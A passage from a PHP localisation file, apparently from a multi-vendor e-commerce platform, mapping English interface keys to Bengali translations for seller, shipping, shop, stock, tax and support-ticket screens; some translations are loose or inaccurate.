শিপিং', 'seller test digital product 2' => 'বিক্রেতা চেক ডিজিটাল পণ্য 2', 'seller test product 1' => 'বিক্রেতা চেক পণ্য 1', 'seller variation wise product' => 'বিক্রেতার ভ্যারিয়েশন অনুসারে পণ্য', 'seller wallet histor...' => 'বিক্রেতা ওয়ালেট হিস্টোরি ...', 'seller wallets' => 'বিক্রেতা ওয়ালেট', 'seller-Info' => 'বিক্রেতা-ইনফো', 'seller_Details' => 'বিক্রেতার ডিটেলস', 'seller_Discount' => 'বিক্রেতা ছাড়', 'seller_Earning' => 'বিক্রেতা উপার্জন', 'seller_Image' => 'বিক্রেতার চিত্র', 'seller_Info' => 'বিক্রেতার তথ্য', 'seller_Information' => 'বিক্রেতার তথ্য', 'seller_List' => 'বিক্রেতার তালিকা', 'seller_Net_Income' => 'বিক্রেতা নেট আয়', 'seller_Order' => 'বিক্রেতার অর্ডার', 'seller_Orders' => 'বিক্রেতা অর্ডার', 'seller_POS' => 'বিক্রেতা POS', 'seller_Product_List' => 'বিক্রেতা পণ্য তালিকা', 'seller_Products' => 'বিক্রেতা পণ্য', 'seller_Reports' => 'বিক্রেতা রিপোর্ট', 'seller_Sales' => 'বিক্রেতা বিক্রয়', 'seller_Wallet' => 'বিক্রেতা ওয়ালেট', 'seller_Wallet_Status' => 'বিক্রেতা ওয়ালেট স্ট্যাটাস', 'seller_amount' => 'বিক্রেতার পরিমাণ', 'seller_app_version_control' => 'বিক্রেতা অ্যাপ সংস্করণ নিয়ন্ত্রণ', 'seller_apply' => 'বিক্রেতা আবেদন', 'seller_b' => 'বিক্রেতা ', 'seller_can_set_own_shop_order_limit_individually' => 'বিক্রেতা স্বতন্ত্রভাবে নিজের শপ অর্ডার সীমা সেট করতে পারেন', 'seller_details' => 'বিক্রেতার ডিটেলস', 'seller_discount' => 'বিক্রেতা ছাড়', 'seller_earnings' => 'বিক্রেতার উপার্জন', 'seller_email' => 'বিক্রেতা ইমেল', 'seller_image' => 'বিক্রেতার চিত্র', 'seller_info' => 'বিক্রেতার তথ্য', 'seller_information' => 'বিক্রেতার তথ্য', 'seller_is' => 'বিক্রেতা হয়', 'seller_list' => 'বিক্রেতার তালিকা', 'seller_login' => 'বিক্রেতা লগইন', 'seller_name' => 'বিক্রেতার নাম', 'seller_net_income' => 'বিক্রেতা নেট আয়', 'seller_phone' => 'বিক্রেতা ফোন', 'seller_pos_permission_updated.' => 'বিক্রেতা POS অনুমতি আপডেট।', 'seller_product_sale_Report' => 'বিক্রেতা পণ্য বিক্রয় রিপোর্ট', 'seller_reg' => 'বিক্রেতা রেজি', 'seller_registration' => 'বিক্রেতার নিবন্ধকরণ', 'seller_settings' => 'বিক্রেতা সেটিংস', 'seller_setup' => 'বিক্রেতা সেটআপ', 'seller_shipping_method' => 'বিক্রেতা শিপিং পদ্ধতি', 'seller_table' => 'বিক্রেতা টেবিল', 'seller_wallet' => 'বিক্রেতা ওয়ালেট', 'seller_wise_shipping' => 'বিক্রেতা শিপিং', 'seller_wise_shipping_method' => 'বিক্রেতা শিপিং পদ্ধতি', 'seller_withdraws' => 'বিক্রেতা উইথড্র করে', 'seller_zone' => 'বিক্রেতা অঞ্চল', 'sellers' => 'বিক্রেতারা', 'sellers_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'বিক্রেতারা এমন সমস্ত পণ্য দেখতে পাবেন যা যখন তারা এই পুনরায় অর্ডার লেভেলে পৌঁছায় তখন কোনও ক্যাটাগরিে পুনরায় স্টক করা দরকার', 'sellers_will_download_the_latest_seller_app_version_using_this_URL' => 'বিক্রেতারা এই ইউআরএল ব্যবহার করে সর্বশেষতম বিক্রেতা অ্যাপ্লিকেশন সংস্করণটি ডাউনলোড করবেন', 'sellers_will_handle_the_shipping_responsibilities_when_you_choose_seller_wise_shipping_method' => 'আপনি যখন বিক্রেতার শিপিং পদ্ধতিটি বেছে নেন তখন বিক্রেতারা শিপিংয়ের দায়িত্বগুলি পরিচালনা করবেন', 'sellersfgm .' => 'বিক্রেতাফজিএম।', 'selling_price' => 'বিক্রয় মূল্য', 'senang_pay' => 'senang pay', 'send' => 'প্রেরণ', 'send successfully' => 'সফলভাবে প্রেরণ', 'send_Notification' => 'নোটিফিকেশন প্রেরণ', 'send_Reply' => 'উত্তর পাঠান', 'send_a_message' => 'একটি মেসেজ পাঠান', 'send_a_test_mail_to_your_email' => 'আপনার ইমেলটিতে একটি চেক মেল প্রেরণ করুন', 'send_mail' => 'মেইল পাঠাও', 'send_notification' => 'নোটিফিকেশন প্রেরণ', 'send_successfully' => 'সফলভাবে প্রেরণ', 'send_test_mail' => 'টেস্ট মেল প্রেরণ করুন', 'send_us_a_message' => 'আমাদের একটি মেসেজ পাঠান', 'send_your_wallet_money_while_order' => 'অর্ডার দেওয়ার সময় আপনার ওয়ালেট টাকা প্রেরণ করুন', 'sendgrid_mail' => 'সেন্ডগ্রিড মেল', 'sendgrid_mail_config' => 'সেন্ডগ্রিড মেল কনফিগারেশন', 'sent' => 'প্রেরণ', 'sent_in_your_email' => 'আপনার ইমেল প্রেরণ', 'sent_in_your_phone' => 'আপনার ফোনে প্রেরণ', 'seo_section' => 'এসইও ক্যাটাগরি', 'server' => 'সার্ভার', 'server_Key' => 'সার্ভার কী', 'server_key' => 'Server key', 'set_Priority' => 'অগ্রাধিকার নির্ধারন কর', 'set_Up' => 'সেট আপ', 'set_delivery_address' => 'ডেলিভারি ঠিকানা সেট করুন', 'set_from_map' => 'মানচিত্র থেকে সেট করুন', 'set_how_users_of_recover_their_forgotten_password' => 'কীভাবে ব্যবহারকারীরা তাদের ভুলে যাওয়া পাসওয়ার্ড পুনরুদ্ধার করুন সেট করুন', 'set_minimum_order_amount' => 'সর্বনিম্ন অর্ডার পরিমাণ নির্ধারণ করুন', 'set_the_Tax_Amount_in_percentage_here' => 'ট্যাক্সের পরিমাণ এখানে শতাংশে সেট করুন', 'set_the_default_commission_amount_that_will_be_received_from_sellers_on_each_order' => 'প্রতিটি অর্ডারে বিক্রেতাদের কাছ থেকে প্রাপ্ত ডিফল্ট কমিশনের পরিমাণ সেট করুন', 'set_the_earning_amount_for_each_successful_referral' => 'প্রতিটি সফল রেফারেলের জন্য উপার্জনের পরিমাণ সেট করুন', 'set_the_minimum_order_amount_a_customer_must_order_from_the_inhouse_shop' => 'কোনও গ্রাহককে ইনহাউস শপ থেকে অর্ডার করতে হবে সর্বনিম্ন অর্ডার পরিমাণ নির্ধারণ করুন', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_wont_start' => 'গ্রাহকদের অবশ্যই পছন্দ করতে হবে ন্যূনতম অর্ডার পরিমাণ নির্ধারণ করুন। অন্যথায় চেকআউট প্রক্রিয়া শুরু হবে না', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_wont_be_applied_if_you_set_a_variation_wise_price' => 'এই পণ্যের প্রতিটি ইউনিটের জন্য বিক্রয় মূল্য সেট করুন। আপনি যদি কোনও বৈচিত্র্য অনুসারে মূল্য নির্ধারণ করেন তবে এই ইউনিটের মূল্য ক্যাটাগরিটি প্রয়োগ করা হবে না', 'set_the_shipping_cost_for_this_product_here._Shipping_cost_will_only_be_applicable_if_product-wise_shipping_is_enabled.' => 'এই পণ্যটির জন্য শিপিং ব্যয়টি এখানে সেট করুন। শিপিং ব্যয় কেবল তখনই প্রযোজ্য হবে যদি পণ্য-ভিত্তিক শিপিং এনাবল করা থাকে।', 'set_the_stock_limit_for_the_Reorder_level' => 'পুনরায় অর্ডার লেভেলের জন্য স্টক সীমা সেট করুন', 'set_the_tax_calculation_method_from_here._Select_Include_with_product_to_combine_product_price_and_tax_on_the_checkout._Pick_Exclude_from_product_to_display_product_price_and_tax_amount_separately.' => 'এখান থেকে ট্যাক্স গণনা পদ্ধতি সেট করুন। চেকআউটে পণ্যের মূল্য এন্ড ট্যাক্স একত্রিত করতে "পণ্যের সাথে অন্তর্ভুক্ত করুন" নির্বাচন করুন। পণ্যের মূল্য এন্ড করের পরিমাণ আলাদাভাবে প্রদর্শন করতে "পণ্য থেকে বাদ দিন" বেছে নিন।', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'দোকানের জন্য ভ্যাকেশনের মোড সেট করুন মানে আপনি সেই সময়ে অর্ডার এন্ড সরবরাহকারী পণ্যগুলি প্রাপ্ত করবেন না', 'set_whether_sellers_need_admin_approval_before_adding_new_products_to_their_shops' => 'বিক্রেতাদের তাদের দোকানে নতুন পণ্য যুক্ত করার আগে অ্যাডমিন অনুমোদনের প্রয়োজন কিনা তা নির্ধারণ করুন', 'setting' => 'বিন্যাস', 'settings' => 'সেটিংস', 'setup' => 'সেটআপ', 'sgred' => 'Sgred', 'share' => 'শেয়ার', 'shipping' => 'শিপিং', 'shipping Cost' => 'পেমেন্ট খরচ', 'shipping addresses' => 'শিপিং ঠিকানা', 'shipping methods' => 'শিপিং পদ্ধতি', 'shipping types' => 'শিপিং প্রকার', 'shipping_Address' => 'প্রেরণের ঠিকানা', 'shipping_Charge' => 'বহন খরচ', 'shipping_Fee' => 'শিপিং ফি', 'shipping_Method' => 'পরিবহণ মাধ্যম', 'shipping_Method_deleted_successfully' => 'শিপিং পদ্ধতি সফলভাবে মুছে ফেলা', 'shipping_address' => 'প্রেরণের ঠিকানা', 'shipping_address_has_been_given_below' => 'শিপিংয়ের ঠিকানা নীচে দেওয়া হয়েছে', 'shipping_and_billing_address' => 'শিপিং এন্ড বিলিং ঠিকানা', 'shipping_charge' => 'বহন খরচ', 'shipping_confirmation_email' => 'শিপিং নিশ্চিতকরণ ইমেল', 'shipping_cost' => 'পেমেন্ট খরচ', 'shipping_cost_multiply_with_quantity' => 'শিপিং ব্যয় পরিমাণের সাথে গুণ', 'shipping_details' => 'শিপিং ডিটেলস', 'shipping_earn' => 'শিপিং উপার্জন', 'shipping_fee' => 'শিপিং ফি', 'shipping_id_is_required' => 'শিপিং আইডি প্রয়োজন', 'shipping_info' => 'জাহাজীকরন তথ্য', 'shipping_input_by_customer' => 'গ্রাহক দ্বারা শিপিং ইনপুট', 'shipping_method' => 'পরিবহণ মাধ্যম', 'shipping_method_for_In-house_deliver' => 'ইন-হাউস ডেলিভারির জন্য শিপিং পদ্ধতি', 'shipping_method_update' => 'শিপিং পদ্ধতি আপডেট', 'shipping_method_updated_successfully' => 'শিপিং পদ্ধতি সফলভাবে আপডেট হয়েছে', 'shipping_method_updated_successfully!!' => 'শিপিং পদ্ধতি সফলভাবে আপডেট হয়েছে !!', 'shipping_responsibility' => 'শিপিং দায়িত্ব', 'shipping_responsibility_updated_successfully' => 'শিপিংয়ের দায়িত্ব সফলভাবে আপডেট হয়েছে', 'shipping_responsibility_updated_successfully!!' => 'শিপিংয়ের দায়িত্ব সফলভাবে আপডেট হয়েছে !!', 'shipping_to' => 'শিপিং', 'shipping_type' => 'শিপিং টাইপ', 'shipping_type_updated_successfully!!' => 'শিপিং টাইপ সফলভাবে আপডেট হয়েছে !!', 'shop' => 'দোকান', 'shop followers' => 'দোকান অনুসরণকারী', 'shop_Info' => 'শপ তথ্য', 'shop_Information' => 'কেনাকাটা তথ্য', 'shop_Name' => 'শপ নাম', 'shop_Page' => 'শপ পৃষ্ঠা', 'shop_address' => 'দোকান ঠিকানা', 'shop_address_is_required' => 'দোকানের ঠিকানা প্রয়োজনীয়', 'shop_again_from_your_recent_store' => 'আপনার সাম্প্রতিক স্টোর থেকে আবার কেনাকাটা করুন', 'shop_apply_successfully' => 'দোকান আবেদন সফলভাবে', 'shop_banner' => 'শপ ব্যানার', 'shop_bottom_banner' => 'শপ বটম ব্যানার', 'shop_cart' => 'শপ কার্ট', 'shop_details' => 'শপ ডিটেলস', 'shop_does_not_exist' => 'দোকান বিদ্যমান নেই', 'shop_info' => 'শপ তথ্য', 'shop_information' => 'কেনাকাটা তথ্য', 'shop_logo' => 'শপ লোগো', 'shop_name' => 'শপ নাম', 'shop_now' => 'এখনই কিনুন', 'shop_overview' => 'ওভারভিউ শপ করুন', 'shop_page' => 'শপ পৃষ্ঠা', 'shop_secondary_banner' => 'শপ সেকেন্ডারি ব্যানার', 'shop_settings' => 'দোকান সেটিংস', 'shop_unfollow' => 'শপ আনফলো', 'shop_view' => 'শপ ভিউ', 'shop_wise_with' => 'সাথে কেনা', 'shopping_cart' => 'বাজারের ব্যাগ', 'shopping_details' => 'শপিংয়ের ডিটেলস', 'shops' => 'দোকান', 'short_cut_keys' => 'শর্ট কাট কী', 'short_description' => 'ছোট বর্ণনা', 'short_title' => 'ছোট শিরোনাম', 'show' => 'শো', 'show_Billing_Address_In_Checkout' => 'চেকআউটে বিলিং ঠিকানা দেখান', 'show_as_featured' => 'ফীচার একাউন্টে প্রদর্শন করুন', 'show_brand' => 'ব্র্যান্ড প্রদর্শন করুন', 'show_brand:' => 'ব্র্যান্ড দেখান:', 'show_data' => 'ডেটা দেখান', 'show_data_by_date_range' => 'তারিখের পরিসীমা অনুসারে ডেটা দেখান', 'show_hide_food_menu' => 'হাইড ফুড মেনু দেখান', 'show_locations_on_map' => 'মানচিত্রে লোকেশন গুলি দেখান', 'show_password' => 'পাসওয়ার্ড দেখাও', 'sid' => 'SID', 'sidebar_Banner' => 'সাইডবার ব্যানার', 'sign-up' => 'নিবন্ধন করুন', 'sign_Out' => 'সাইন আউট', 'sign_in' => 'সাইন ইন করুন', 'sign_in_with_facebook' => 'ফেসবুকে সাইন - ইন করুন', 'sign_in_with_google' => 'গুগলের সাথে সাইন ইন করুন', 'sign_out' => 'সাইন আউট', 'sign_up' => 'নিবন্ধন করুন', 'sign_up_with_facebook' => 'ফেসবুক দিয়ে সাইন আপ', 'sign_up_with_google' => 'গুগলের সাথে সাইন আপ করুন', 'signature_product' => 'সিগন্যাট্রার পণ্য', 'signature_product_for_this_season' => 'এই মৌসুম জন্য সিগন্যাট্রার পণ্য', 'similar' => 'অনুরূপ', 'similar_Products_From_Other_Stores' => 'অন্যান্য স্টোর থেকে অনুরূপ পণ্য', 'similar_category_product' => 'অনুরূপ ক্যাটাগরি পণ্য', 'similar_product_from_this_store' => 'এই স্টোর থেকে অনুরূপ পণ্য', 'similar_product_not_available' => 'অনুরূপ পণ্য এভেইল্যাবলে নয়', 'similar_products' => 'একই পণ্য', 'sing_in' => 'সাইন ইন করুন', 'sing_in_with_facebook' => 'ফেসবুকে সাইন - ইন করুন', 'sing_in_with_google' => 'গুগলের সাথে সাইন ইন করুন', 'sing_up' => 'নিবন্ধন করুন', 'sing_up_with_facebook' => 'ফেসবুক দিয়ে সাইন আপ', 'sing_up_with_google' => 'গুগলের সাথে সাইন আপ করুন', 'single_shipping_method' => 'একক শিপিং পদ্ধতি', 'single_vendor' => 'একক বিক্রেতা', 'site_Key' => 'সাইট কী', 'site_URL' => 'সাইট URL টি', 'size' => 'আকার', 'skip' => 'এড়িয়ে যান', 'sl' => 'এসএল', 'sl#' => 'এসএল#', 'slug' => 'স্লাগ', 'sms' => 'SMS', 'sms_gateways_configuration' => 'এসএমএস গেটওয়ে কনফিগারেশন', 'sms_setup' => 'এসএমএস সেটআপ', 'smtp' => 'এসএমটিপি', 'smtp.mailtrap.io' => 'Smtp.mailtrap.io', 'smtp_mail' => 'এসএমটিপি মেল', 'smtp_mail_config' => 'এসএমটিপি মেল কনফিগারেশন', 'so_that_they_can_also_update_their_store_banners_according_to_the_new_theme_ratio' => 'যাতে তারা নতুন থিম অনুপাত অনুসারে তাদের স্টোর ব্যানারগুলি আপডেট করতে পারে', 'social_Link_Is_Requeired.' => 'সোশ্যাল লিঙ্কটি প্রয়োজনীয়।', 'social_Login' => 'সোশ্যাল লগইন', 'social_Media_Already_taken' => 'সোশ্যাল মিডিয়া ইতিমধ্যে নেওয়া হয়েছে', 'social_Media_Chatting' => 'সোশ্যাল মিডিয়া চ্যাটিং', 'social_Media_Links' => 'সোশ্যাল মিডিয়া লিঙ্ক', 'social_Media_inserted_Successfully.' => 'সোশ্যাল মিডিয়া সফলভাবে আপডেট', 'social_Name_Is_Requeired.' => 'সোশ্যাল নাম প্রয়োজন।', 'social_info_updated_successfully.' => 'সোশ্যাল তথ্য সফলভাবে আপডেট হয়েছে।', 'social_login' => 'সোশ্যাল লগইন', 'social_media' => 'সোশ্যাল মাধ্যম', 'social_media_deleted_successfully.' => 'সোশ্যাল মিডিয়া সফলভাবে মুছে ফেলা হয়েছে।', 'social_media_form' => 'সোশ্যাল মিডিয়া ফর্ম', 'social_media_link' => 'সোশ্যাল মিডিয়া লিঙ্ক', 'social_media_table' => 'সোশ্যাল মিডিয়া টেবিল', 'software' => 'সফটওয়্যার', 'software_update' => 'সফ্টওয়্যার আপডেট', 'software_version' => 'সফ্টওয়্যার সংস্করণ', 'sold' => 'বিক্রি', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'কিছু ক্রিয়া ডিস্যাবল করা হয়েছে কারণ অ্যাডমিন কুপন যুক্ত করেছে', 'some_features_will_changed' => 'কিছু ফীচার পরিবর্তন হবে', 'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'কিছু স্ট্যাটাস বোতামগুলি ডিস্যাবল করা হয়েছে কারণ অ্যাডমিন কুপন যুক্ত করেছে', 'soon_Stock_Out' => 'শীঘ্রই স্টক আউট', 'sorry' => 'দুঃখিত', 'sorry_no_review_found_to_show_you' => 'দুঃখিত আপনাকে দেখানোর জন্য কোনও রিভিউ পাওয়া যায় নি', 'sorry_product_is_out_of_stock.' => 'দুঃখিত পণ্য স্টকের বাইরে।', 'sorry_product_out_of_stock' => 'দুঃখিত পণ্য স্টক বাইরে', 'sorry_stock_is_limited' => 'দুঃখিত স্টক সীমাবদ্ধ', 'sorry_stock_limit_exceeded.' => 'দুঃখিত স্টক সীমা অতিক্রম করেছে।', 'sorry_the_minimum_order_quantity_does_not_match' => 'দুঃখিত সর্বনিম্ন অর্ডার পরিমাণের সাথে মেলে না', 'sorry_this_item_is_currently_sold_out' => 'দুঃখিত এই আইটেমটি বর্তমানে বিক্রিত', 'sort_by' => 'ক্রমানুসার', 'sort_by_(high_to_low)' => 'বাছাই করুন (উচ্চ থেকে নিম্ন)', 'sort_by_(low_to_high)' => 'বাছাই করুন (নিম্ন থেকে উচ্চ)', 'sound' => 'শব্দ', 'special' => 'বিশেষ', 'ssl commerz' => 'এসএসএল কমার্জ', 'ssl_commerz' => 'এসএসএল কমার্জ', 'ssl_commerz_payment' => 'এসএসএল কমার্জ পেমেন্ট', 'sslcommerz' => 'Sslcommerz', 'star' => 'তারকা', 'start' => 'শুরু', 'start Date' => 'শুরুর তারিখ', 'start date' => 'শুরুর তারিখ', 'start_Date' => 'শুরুর তারিখ', 'start_a_conversation' => 'একটি কথোপকথন শুরু করুন', 'start_a_new_message' => 'একটি নতুন মেসেজ শুরু করুন', 'start_date' => 'শুরুর তারিখ', 'start_from' => 'থেকে শুরু', 'start_typing' => 'টাইপিং শুরু করুন', 'start_typing...' => 'টাইপিং শুরু করুন...', 'started_on' => 'শুরু', 'status' => 'স্ট্যাটাস', 'status সফলভাবে আপডেট করা হয়েছে৷' => 'স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'status_Update_Successfully' => 'সফলভাবে স্ট্যাটাস আপডেট', 'status_change_successfully' => 'সফলভাবে স্ট্যাটাস পরিবর্তন', 'status_not_changable_now' => 'স্ট্যাটাস এখন চ্যাংযোগ্য নয়', 'status_update_failed' => 'স্ট্যাটাস আপডেট ব্যর্থ হয়েছে', 'status_update_failed.' => 'স্ট্যাটাস আপডেট ব্যর্থ হয়েছে।', 'status_updated_failed.' => 'স্ট্যাটাস আপডেট হয়েছে ব্যর্থ।', 'status_updated_successfully' => 'স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'stock' => 'স্টক', 'stock_Available' => 'পরিমান মত মজুত আছে', 'stock_available' => 'পরিমান মত মজুত আছে', 'stock_limit_products' => 'স্টক সীমা পণ্য', 'stock_limit_products_list' => 'স্টক সীমাবদ্ধ পণ্য তালিকা', 'stock_not_available' => 'স্টক এভেইল্যাবলে নেই', 'stock_out' => 'মজুত শেষ', 'stock_sort_by_(high_to_low)' => 'স্টক বাছাই করে (উচ্চ থেকে নিম্ন)', 'stock_sort_by_(low_to_high)' => 'স্টক বাছাই (নিম্ন থেকে উচ্চ)', 'stock_status' => 'স্টক স্ট্যাটাস', 'storage_bucket' => 'স্টোরেজ বালতি', 'store' => 'স্টোর', 'store_Client_ID' => 'ক্লায়েন্ট আইডি ষ্টোর করুন', 'store_Client_Secret_Key' => 'ক্লায়েন্ট সিক্রেট কী স্টোর', 'store_ID' => 'স্টোর আইডি', 'store_address' => 'স্টোর ঠিকানা', 'store_banner' => 'স্টোর ব্যানার', 'store_list' => 'স্টোর তালিকা', 'store_logo' => 'লোগো স্টোর', 'store_name' => 'দোকানের নাম', 'store_password' => 'পাসওয়ার্ড সেভ করুন', 'stores' => 'স্টোর', 'stores_one' => 'একটি ষ্টোর', 'stores_two' => 'দুটি ষ্টোর', 'street_1 _street_2 _street_3 _street_4' => 'স্ট্রিট 1 স্ট্রিট 2 স্ট্রিট 3 স্ট্রিট 4', 'string' => 'স্ট্রিং', 'stripe' => 'stripe', 'sub_Categories' => 'সাব ক্যাটাগরি', 'sub_Category' => 'সাব ক্যাটাগরি', 'sub_Sub_Categories' => 'সাব সাব ক্যাটাগরি', 'sub_Sub_Category' => 'সাব সাব ক্যাটাগরি', 'sub_Title' => 'সাব শিরোনাম', 'sub_categories' => 'সাব ক্যাটাগরি', 'sub_category' => 'সাব ক্যাটাগরি', 'sub_category_Logo' => 'সাব ক্যাটাগরি লোগো', 'sub_category_form' => 'সাব ক্যাটাগরি ফর্ম', 'sub_category_list' => 'সাব ক্যাটাগরি তালিকা', 'sub_category_table' => 'সাব ক্যাটাগরি সারণী', 'sub_sub_categories' => 'সাব সাব ক্যাটাগরি', 'sub_sub_category' => 'সাব সাব ক্যাটাগরি', 'sub_sub_category_form' => 'সাব সাব ক্যাটাগরি ফর্ম', 'sub_sub_category_list' => 'সাব সাব ক্যাটাগরি তালিকা', 'sub_sub_category_name' => 'সাব সাব ক্যাটাগরি নাম', 'sub_sub_category_table' => 'সাব সাব ক্যাটাগরি সারণী', 'sub_total' => 'সাব টোটাল', 'subcategory' => 'উপশ্রেণী', 'subject' => 'বিষয়', 'submit' => 'জমা দিন', 'submit_a_review' => 'একটি রিভিউ জমা দিন', 'submit_a_ticket' => 'টিকিট জমা দিন', 'submit_message' => 'মেসেজ জমা দিন', 'submit_new_ticket' => 'নতুন টিকিট জমা দিন', 'submition_date' => 'জমা দেওয়ার তারিখ', 'subscribe' => 'সাবস্ক্রাইব', 'subscribe to our new channel to get latest updates' => 'সর্বশেষ আপডেট পেতে আমাদের নতুন চ্যানেলে সাবস্ক্রাইব করুন', 'subscribe_our_newsletter_to_get_latest_updates' => 'সর্বশেষ আপডেট পেতে আমাদের নিউজলেটার সাবস্ক্রাইব করুন', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'সর্বশেষ আপডেট পেতে আমাদের নতুন চ্যানেলে সাবস্ক্রাইব করুন', 'subscriber_list' => 'গ্রাহক তালিকা', 'subscribers' => 'গ্রাহকরা', 'subscription_date' => 'সাবস্ক্রিপশন তারিখ', 'subscriptions' => 'সাবস্ক্রিপশন', 'subtotal' => 'সাবটোটাল', 'successfully added!' => 'সাফল্যের সাথে যুক্ত!', 'successfully product added!' => 'সফলভাবে পণ্য যুক্ত!', 'successfully product deleted!' => 'সফলভাবে পণ্য মুছে ফেলা!', 'successfully product updated!' => 'সফলভাবে পণ্য আপডেট হয়েছে!', 'successfully removed!' => 'সফলভাবে সরানো!', 'successfully review submitted!' => 'সফলভাবে রিভিউ জমা দেওয়া!', 'successfully updated!' => 'সফলভাবে আপডেট!', 'successfully_added' => 'সফলভাবে যুক্ত', 'successfully_added!' => 'সাফল্যের সাথে যুক্ত!', 'successfully_added_review' => 'সফলভাবে রিভিউ যুক্ত', 'successfully_canceled' => 'সফলভাবে ক্যানসেল', 'successfully_copied' => 'সফলভাবে অনুলিপি করা', 'successfully_removed' => 'সফলভাবে সরানো হয়েছে', 'successfully_updated' => 'সফলভাবে আপডেট', 'successfully_updated!' => 'সফলভাবে আপডেট!', 'successfully_uploaded' => 'সফলভাবে আপলোড', 'summary' => 'সারসংক্ষেপ', 'support' => 'সাপোর্ট', 'support ticket convs' => 'সাপোর্ট টিকিট কনভস', 'support tickets' => 'টিকিট সাপোর্ট', 'support_Ticket' => 'সাপোর্ট টিকিট', 'support_Ticket_Answer' => 'সাপোর্ট টিকিট উত্তর', 'support_section' => 'সাপোর্ট ক্যাটাগরি', 'support_ticket' => 'সাপোর্ট টিকিট', 'support_ticket_inbox' => 'সাপোর্ট টিকিট ইনবক্স', 'suspend' => 'সাসপেন্ড', 'suspend_this_seller' => 'এই বিক্রেতা সাসপেন্ড করুন', 'system' => 'পদ্ধতি', 'system_Addons' => 'সিস্টেম অ্যাডনস', 'system_Settings' => 'পদ্ধতি নির্ধারণ', 'system_Setup' => 'সিস্টেম সেটআপ', 'system_default' => 'সিস্টেমের ডিফল্ট', 'system_default_currency' => 'সিস্টেম ডিফল্ট মুদ্রা', 'system_setup' => 'সিস্টেম সেটআপ', 't_id' => 'টি আইডি', 'table' => 'টেবিল', 'tag' => 'ট্যাগ', 'tags' => 'ট্যাগ', 'tax' => 'কর', 'tax_Collected' => 'কর আদায়', 'tax_Model' => 'কর মডেল', 'tax_amount' => 'করের পরিমাণ', 'tax_calculation' => 'কর একাউন্ট', 'tax_fee' => 'কর ফি', 'tax_incl.' => 'ট্যাক্স সহ।', 'tax_included' => 'কর সংযুক্তি', 'team_ID' => 'টিম আইডি', 'team_id' => 'টিম আইডি', 'template_id' => 'টেমপ্লেট আইডি', 'temporary_Close' => 'অস্থায়ী ভাবে ক্লোস', 'temporary_block_time' => 'অস্থায়ী ব্লক সময়', 'temporary_close' => 'অস্থায়ী কাছাকাছি', 'temporary_close_inactive_successfully' => 'অস্থায়ী বন্ধ সফলভাবে নিষ্ক্রিয়', 'temporary_close_updated_successfully' => 'অস্থায়ী ক্লোজ সফলভাবে আপডেট হয়েছে', 'temporary_closed' => 'অস্থায়ী বন্ধ', 'temporary_login_block_time' => 'অস্থায়ী লগইন ব্লক সময়', 'terms_&_Conditions' => 'টার্মস এন্ড কন্ডিশন', 'terms_&_conditions' => 'টার্মস এন্ড কন্ডিশন', 'terms_&_policy' => 'টার্মস এন্ড পলিসি', 'terms_and_condition' => 'শর্তাবলী', 'test' => 'চেক', 'test 1' => 'চেক 1', 'test product' => 'চেক পণ্য', 'test product 1' => 'চেক পণ্য 1', 'test product 2' => 'চেক পণ্য 2', 'test product minus value' => 'টেস্ট প্রোডাক্ট মাইনাস ভ্যালু', 'test shipping' => 'চেক শিপিং', 'test_SMTP_connection' => 'চেক এসএমটিপি সংযোগ', 'test_your_email_integration' => 'আপনার ইমেল ইন্ট্রিগ্রেশন চেক করুন', 'text' => 'টেক্সট', 'text_color' => 'লেখার রঙ', 'text_fee' => 'কর ফি', 'text_updated_successfully' => 'টেক্সট সফলভাবে আপডেট হয়েছে', 'thank_you_for_order' => 'অর্ডারের জন্য আপনাকে ধন্যবাদ', 'thank_you_for_your_order' => 'আপনার অর্ডারের জন্য আপনাকে ধন্যবাদ', 'thank_you_for_your_verification' => 'আপনার যাচাইয়ের জন্য আপনাকে ধন্যবাদ', 'thanks' => 'ধন্যবাদ', 'thanks_for_shopping_with' => 'সাথে কেনাকাটা করার জন্য ধন্যবাদ', 'thanks_for_the_order' => 'অর্ডারের জন্য ধন্যবাদ', 'the_amount_needs_to_be_between' => 'পরিমাণের মধ্যে থাকা দরকার', 'the_app_download_link_is_the_URL_that_allows_users_to_update_the_app_by_clicking_the_Update_App_button_within_the_app_itself' => 'অ্যাপ্লিকেশন ডাউনলোড লিঙ্কটি হল ইউআরএল যা ব্যবহারকারীদের অ্যাপ্লিকেশনটির মধ্যে আপডেট অ্যাপ বোতামটি ক্লিক করে অ্যাপ্লিকেশনটি আপডেট করতে দেয়', 'the_bonus_amount_will_be_deduct_from_admin_wallet_&_will_consider_as_admin_expense' => 'বোনাসের পরিমাণটি অ্যাডমিন ওয়ালেট থেকে ছাড় দেওয়া হবে এন্ড অ্যাডমিন ব্যয় একাউন্টে বিবেচনা করা হবে', 'the_coupon_discount_bearer_is_admin' => 'কুপন ছাড় বহনকারী অ্যাডমিন', 'the_lowest_number_get_highest_priority' => 'সর্বনিম্ন সংখ্যা সর্বোচ্চ অগ্রাধিকার পায়', 'the_lowest_number_will_get_highest_priority' => 'সর্বনিম্ন সংখ্যা সর্বোচ্চ অগ্রাধিকার পাবে', 'the_lowest_number_will_get_the_highest_priority' => 'সর্বনিম্ন সংখ্যাটি সর্বোচ্চ অগ্রাধিকার পাবে', 'the_minimum_customer_app_version_required_for_the_app_functionality' => 'অ্যাপ্লিকেশন কার্যকারিতা জন্য প্রয়োজনীয় সর্বনিম্ন গ্রাহক অ্যাপ্লিকেশন সংস্করণ', 'the_minimum_deliveryman_app_version_required_for_the_app_functionality' => 'অ্যাপ্লিকেশন কার্যকারিতার জন্য প্রয়োজনীয় সর্বনিম্ন ডেলিভারি অ্যাপ্লিকেশন সংস্করণ', 'the_minimum_seller_app_version_required_for_the_app_functionality' => 'অ্যাপ্লিকেশন কার্যকারিতার জন্য প্রয়োজনীয় সর্বনিম্ন বিক্রেতা অ্যাপ্লিকেশন সংস্করণ', 'the_ongoing_order_amount_will_be_shown_here' => 'চলমান অর্ডারের পরিমাণ এখানে প্রদর্শিত হবে', 'the_page_you_requested_could_not_be_found' => 'আপনার অনুরোধ পৃষ্ঠা 